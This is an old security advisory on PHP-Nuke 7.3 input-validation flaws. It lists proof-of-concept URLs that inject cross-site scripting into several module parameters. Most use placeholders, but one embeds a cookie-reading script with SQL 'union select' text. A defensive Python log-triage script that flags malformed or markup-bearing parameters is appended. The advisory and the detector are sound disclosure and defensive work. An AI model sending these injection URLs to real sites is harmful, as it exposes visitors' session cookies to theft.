PHP-Nuke Multiple Input Validation Vulnerabilities

The following proof-of-concept URLs are available:
http://www.example.com/nuke73/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar
http://www.example.com/nuke73/modules.php?name=News&file=article&sid=1&optionbox=[xss code here]
http://www.example.com/nuke73/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss code here]
http://www.example.com/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=[xss code here]&month=05&month_l=May
http://www.example.com/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss code here]&month_l=May
http://www.example.com/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss code here]
http://www.example.com/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss code here]&order=0&thold=0
http://www.example.com/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0
http://www.example.com/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss code here]
http://www.example.com/nuke73/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>
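
For triaging web-server logs against the module parameters listed above, the following is an added example and is not part of the original advisory or of PHP-Nuke's code. The expected value shapes are assumptions inferred from the benign values visible in the URLs, and the function name `audit_request` and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed value shapes per (module, parameter), inferred from the benign
# values that appear in the advisory's URLs (e.g. year=2004, month_l=May).
EXPECTED = {
    ("Statistics", "year"): r"\d{4}",
    ("Statistics", "month"): r"\d{1,2}",
    ("Statistics", "date"): r"\d{1,2}",
    ("Stories_Archive", "year"): r"\d{4}",
    ("Stories_Archive", "month"): r"\d{1,2}",
    ("Stories_Archive", "month_l"): r"[A-Za-z]{1,12}",
    ("Surveys", "mode"): r"[a-z]{1,16}",
    ("Surveys", "order"): r"\d?",        # the advisory shows an empty order=
    ("Surveys", "thold"): r"-?\d{1,2}",
}
MARKUP = re.compile(r"[<>]")             # angle brackets after URL-decoding


def audit_request(target):
    """Return sorted (parameter, reason) findings for one request target."""
    query = urlsplit(target).query
    params = parse_qsl(query, keep_blank_values=True)  # percent-decodes values
    module = next((v for k, v in params if k == "name"), "")
    findings = set()
    for key, value in params:
        pattern = EXPECTED.get((module, key))
        if pattern is not None and not re.fullmatch(pattern, value):
            findings.add((key, "unexpected format"))
        if MARKUP.search(value):
            findings.add((key, "markup characters"))
    return sorted(findings)


# Constructed request targets (not real log data).
SAMPLES = [
    "/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=May",
    "/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=%3Cx%3E",
    "/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=0",
    "/nuke73/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=1x",
    "/nuke73/index.php?foo=bar%20union%20select%20%3Cx%3E",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(audit_request(target), target)
```
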


 

Copyright 2010, SecurityFocus